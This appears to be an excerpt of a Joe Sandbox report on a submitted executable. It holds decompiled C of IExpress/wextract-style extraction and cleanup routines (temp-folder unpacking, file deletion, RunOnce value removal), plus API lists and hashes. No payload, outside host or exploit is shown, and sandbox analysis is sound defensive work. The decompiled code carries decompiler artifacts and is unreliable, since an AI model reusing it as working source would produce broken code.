Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646A0
Part of subcall function 0106468F: SizeofResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646A9
Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646C3
Part of subcall function 0106468F: LoadResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646CC
Part of subcall function 0106468F: LockResource.KERNEL32(00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646D3
Part of subcall function 0106468F: memcpy_s.MSVCRT ref: 010646E5
Part of subcall function 0106468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010646EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,01062F4D,?,00000002,00000000), ref: 01065201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 01065250

Part of subcall function 010644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
Part of subcall function 010644B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554

Part of subcall function 01066285: GetLastError.KERNEL32(01065BBC), ref: 01066285

Strings

<None>, xrefs: 01065262
UPROMPT, xrefs: 010651EF, 01065230

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: 217d7c1ccaeef3f73dd77ecdeffe7151ccea73c98c85314bf5368893e31c3c0f
Instruction ID: c3eef330bfed22f1362ab595fc532fda83a1fd9143d4706d1fca39b9526f6728
Opcode Fuzzy Hash: 217d7c1ccaeef3f73dd77ecdeffe7151ccea73c98c85314bf5368893e31c3c0f
Instruction Fuzzy Hash: 5B1190B1700202FFE3656B755D49B7B619EEBD9384B10442DF6C2EA194DA7E8C014224

Uniqueness

Uniqueness Score: -1.00%

Function 010652B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E010652B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x1068004; // 0x19e58fb5
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x10691e0; // 0xf37c00
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x1068a24 == 0 &&  *0x1069a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x1068a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x1068a24 == 0 &&  *0x1069a30 == 0) {
					_push(_t22);
					E01061781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
					if(( *0x1069a34 & 0x00000020) != 0) {
						E010665E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E01062390( &_v268);
					_t11 =  *0x1068a20; // 0x0
				}
				if( *0x1069a40 != 1 && _t11 != 0) {
					_t11 = E01061FE1(_t22); // executed
				}
				 *0x1068a20 =  *0x1068a20 & 0x00000000;
				return E01066CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x010652b6
0x010652b6
0x010652b6
0x010652c1
0x010652c8
0x010652cb
0x010652cc
0x010652d4
0x010652d6
0x010652d7
0x010652de
0x010652e0
0x010652f2
0x010652fa
0x010652fa
0x01065302
0x01065305
0x0106530c
0x01065312
0x01065316
0x01065316
0x01065317
0x0106531c
0x0106531f
0x01065333
0x01065345
0x01065351
0x01065359
0x01065359
0x01065363
0x01065369
0x0106536f
0x01065374
0x01065374
0x01065381
0x01065387
0x01065387
0x0106538f
0x010653a0

APIs

SetFileAttributesA.KERNELBASE(00F37C00,00000080,?,00000000), ref: 010652F2
DeleteFileA.KERNELBASE(00F37C00), ref: 010652FA
LocalFree.KERNEL32(00F37C00,?,00000000), ref: 01065305
LocalFree.KERNEL32(00F37C00), ref: 0106530C
SetCurrentDirectoryA.KERNELBASE(010611FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 01065363

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01065334

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 2833751637-2356899610
Opcode ID: f11dccf7f03e279170e600e7c515ac2ca5a90831866e2727d404a0e1af32ad51
Instruction ID: fb9863f35e18d11471cc5570666c61d113b4ab6c4c93e276ffa21341bf016ae5
Opcode Fuzzy Hash: f11dccf7f03e279170e600e7c515ac2ca5a90831866e2727d404a0e1af32ad51
Instruction Fuzzy Hash: 4121C331900324DFEB71AF14DC18BAD77F8BB14B54F048199F9C2A75A8CBBA5984CB80

Uniqueness

Uniqueness Score: -1.00%

Function 01061FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01061FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x1068530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x01061fee
0x01062005
0x0106200d
0x01062017
0x00000000
0x01062020
0x0106200d
0x01062029

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0106538C,?,?,0106538C), ref: 01062005
RegDeleteValueA.KERNELBASE(0106538C,wextract_cleanup1,?,?,0106538C), ref: 01062017
RegCloseKey.ADVAPI32(0106538C,?,?,0106538C), ref: 01062020

Strings

wextract_cleanup1, xrefs: 01061FE7, 0106200F
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 01061FFB

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
API String ID: 849931509-1592051331
Opcode ID: e80a688f53287ff99bb07da455a43da5baed72fc294026db9567b33f8af79e5a
Instruction ID: b516f8180392fb4612b31329688f48734ec81bfb7add6c66cdcf8b9c471e95b1
Opcode Fuzzy Hash: e80a688f53287ff99bb07da455a43da5baed72fc294026db9567b33f8af79e5a
Instruction Fuzzy Hash: C2E04F30655319FBFB319A91EC0EF597B6EE700780F10019AFA84B1065E7665A10D704

Uniqueness

Uniqueness Score: -1.00%

Function 01064CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01064CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x1068004; // 0x19e58fb5
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x10691d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E01064E99(_t75);
						L35:
						return E01066CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x1068584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x10691e4;
						_t58 = 0x10691e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x10691e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x10691e4;
						_t30 = E01064702( &_v268, 0x10691e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0106476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E01064980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E010647E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x10693f4 =  *0x10693f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x10691e4;
						_t63 = 0x10691e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x10691e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x10691e4;
						_t30 = E01064702( &_v268, 0x10691e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E01064C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E01064B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E01064B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x01064cd0
0x01064cdb
0x01064ce0
0x01064ce2
0x01064cee
0x01064cf2
0x01064d0e
0x01064d0e
0x01064d11
0x01064e83
0x01064e88
0x01064e98
0x01064e98
0x01064d17
0x01064d17
0x01064d1a
0x01064d2f
0x01064d2f
0x00000000
0x01064d2f
0x01064d1c
0x01064d1c
0x01064d1f
0x01064dcb
0x01064dd0
0x01064dd2
0x01064ddd
0x01064ddd
0x01064de3
0x01064de8
0x01064ded
0x01064ded
0x01064def
0x01064df0
0x01064df0
0x01064df4
0x01064df4
0x01064df6
0x01064df9
0x01064dfc
0x01064dfc
0x01064dfe
0x01064dff
0x01064dff
0x01064e03
0x01064e08
0x01064e0a
0x01064e0f
0x01064d03
0x01064d03
0x00000000
0x01064d03
0x01064e18
0x01064e20
0x01064e25
0x01064e27
0x00000000
0x00000000
0x01064e33
0x01064e38
0x01064e3a
0x00000000
0x00000000
0x01064e40
0x01064e51
0x01064e56
0x01064e5b
0x01064e5e
0x00000000
0x00000000
0x01064e6a
0x01064e6f
0x01064e71
0x00000000
0x00000000
0x01064e77
0x01064e7d
0x00000000
0x01064e7d
0x01064d25
0x01064d25
0x01064d28
0x01064d36
0x01064d3b
0x01064d40
0x01064d40
0x01064d42
0x01064d43
0x01064d43
0x01064d47
0x01064d4a
0x01064d4a
0x01064d4c
0x01064d4f
0x01064d4f
0x01064d51
0x01064d52
0x01064d52
0x01064d56
0x01064d5b
0x01064d5d
0x01064d62
0x00000000
0x00000000
0x01064d67
0x01064d6f
0x01064d74
0x01064d76
0x00000000
0x00000000
0x01064d7c
0x01064d84
0x01064d89
0x01064d8b
0x00000000
0x00000000
0x01064d94
0x01064d99
0x01064d9e
0x01064da1
0x01064daa
0x01064daa
0x01064da3
0x01064da3
0x01064da3
0x01064db5
0x01064dbb
0x01064dbd
0x00000000
0x01064dc3
0x01064dc5
0x00000000
0x01064dc5
0x01064dbd
0x01064d2a
0x01064d2a
0x01064d2d
0x00000000
0x00000000
0x00000000
0x01064d2d
0x01064cf8
0x01064cfd
0x01064d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 01064DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 01064DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01064D36, 01064DE3

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 3625706803-2356899610
Opcode ID: b1da0a2735898d41d299602cf7fe3e5340fb6de678f693caed8371259ad54297
Instruction ID: 4f1cf3fa804f61876e139037cca66a99d12c6fa2dcd5bb578cff3e9683dda9fb
Opcode Fuzzy Hash: b1da0a2735898d41d299602cf7fe3e5340fb6de678f693caed8371259ad54297
Instruction Fuzzy Hash: EA415736A041028BDB71AE3CDD44AF977EDEF66700F0486A8D8C2D7685DA32DA4AC750

Uniqueness

Uniqueness Score: -1.00%

Function 01064C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01064C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x1068d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x1068d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x01064c40
0x01064c4a
0x01064c8d
0x00000000
0x01064c70
0x01064c70
0x01064c7e
0x01064c86
0x00000000
0x00000000
0x00000000
0x01064c8a

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 01064C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01064C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 01064C7E

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: 257df450f572cdcd5dd2b75f2b548eca9c9ecc65b775b695aa0cc8cf7db07ce5
Instruction ID: 94896b555545a0a57c9d5c150a3f9be765c0af6a61783c1ca86f8bfde68f8c77
Opcode Fuzzy Hash: 257df450f572cdcd5dd2b75f2b548eca9c9ecc65b775b695aa0cc8cf7db07ce5
Instruction Fuzzy Hash: F5F0907260020DBFABA4EFA8CC48DFB7FEDEB14250744456BE995D2114EA35D514C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 0106487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0106487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E0106490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x01064880
0x0106488c
0x01064894
0x010648a0
0x010648c9
0x010648ce
0x010648a2
0x010648a8
0x010648b7
0x010648bc
0x010648aa
0x010648ac
0x010648ac
0x010648a8
0x010648de
0x010648e7
0x0106490b
0x010648ee
0x010648f0
0x00000000
0x01064902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,01064A23,?,01064F67,*MEMCAB,00008000,00000180), ref: 010648DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,01064F67,*MEMCAB,00008000,00000180), ref: 01064902

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f77d793f7bb661102d82d53bb0e50bc93710e225666135c469279f61bec5c44b
Instruction ID: 5b7e2631f6fc01bae5b77ec71a53747074852bd3bb0b6af02dd25c5668036fbb
Opcode Fuzzy Hash: f77d793f7bb661102d82d53bb0e50bc93710e225666135c469279f61bec5c44b
Instruction Fuzzy Hash: 7F014BA3E115706AF36450294C88FBB595CCB96A34F1B0335FEEAEB1D1D5644C0482F0

Uniqueness

Uniqueness Score: -1.00%

Function 01064AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E01064AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x106858c; // 0x280
				_t9 = E01063680(_t20);
				if( *0x10691d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x1068d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x1069400; // 0xdca00
							_t15 = _t14 + _t25;
							 *0x1069400 = _t15;
							if( *0x1068184 != 0) {
								_t21 =  *0x1068584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x10693f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x01064ad5
0x01064adb
0x01064ae7
0x01064aee
0x01064b05
0x01064b0d
0x01064b14
0x01064b1a
0x01064b1c
0x01064b21
0x01064b2a
0x01064b2f
0x01064b31
0x01064b39
0x01064b54
0x01064b54
0x01064b39
0x01064b2f
0x01064b0f
0x01064b0f
0x01064b0f
0x01064b5e
0x01064ae9
0x01064aed
0x01064aed

APIs

Part of subcall function 01063680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0106369F
Part of subcall function 01063680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010636B2
Part of subcall function 01063680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010636DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 01064B05

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: 7e697a0564143b4c6338fb15bedf11a51ba498dc4274ff8ffa3d75c617d893d9
Instruction ID: 97622973df91cd31ee687a00963b982cba888359f1f99ef6f9cd1df95ff51e7a
Opcode Fuzzy Hash: 7e697a0564143b4c6338fb15bedf11a51ba498dc4274ff8ffa3d75c617d893d9
Instruction Fuzzy Hash: 79019231200211AFE7249F58DC05BA67B9DFB44729F04D265FAB9DB1E4CB769811CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0106658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0106658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x1068b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x1068b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E010616B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x01066592
0x01066594
0x01066596
0x01066598
0x01066598
0x0106659b
0x0106659b
0x0106659d
0x0106659e
0x010665a2
0x010665a4
0x010665a9
0x010665b2
0x010665b6
0x010665ba
0x010665c3
0x010665c5
0x010665c8
0x010665c8
0x010665c3
0x010665c9
0x010665cc
0x010665d2
0x010665d1
0x010665d1
0x00000000
0x010665dc
0x00000000

APIs

CharPrevA.USER32(01068B3E,01068B3F,00000001,01068B3E,-00000003,?,010660EC,01061140,?), ref: 010665BA

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: bc0fbb42ccc5ae1f6548f646444fe717ba9ef054323539dc5d0e276a57d9df31
Instruction ID: b177eb24085475ce99e74c92769da551d99631b07f286e86ee49aef4a4bfee4d
Opcode Fuzzy Hash: bc0fbb42ccc5ae1f6548f646444fe717ba9ef054323539dc5d0e276a57d9df31
Instruction Fuzzy Hash: FAF04C322042509BE332491DD884BAABFDE9BC6250F1801AEE9DAC3209CA678C4583A4

Uniqueness

Uniqueness Score: -1.00%

Function 0106621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0106621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x1068004; // 0x19e58fb5
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E0106597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E010644B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x1069124 = E01066285();
					_t9 = 0;
				}
				return E01066CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x01066229
0x01066230
0x01066247
0x0106626a
0x01066272
0x01066249
0x01066255
0x0106625f
0x01066264
0x01066264
0x01066284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0106623F

Part of subcall function 010644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
Part of subcall function 010644B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554

Part of subcall function 01066285: GetLastError.KERNEL32(01065BBC), ref: 01066285

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
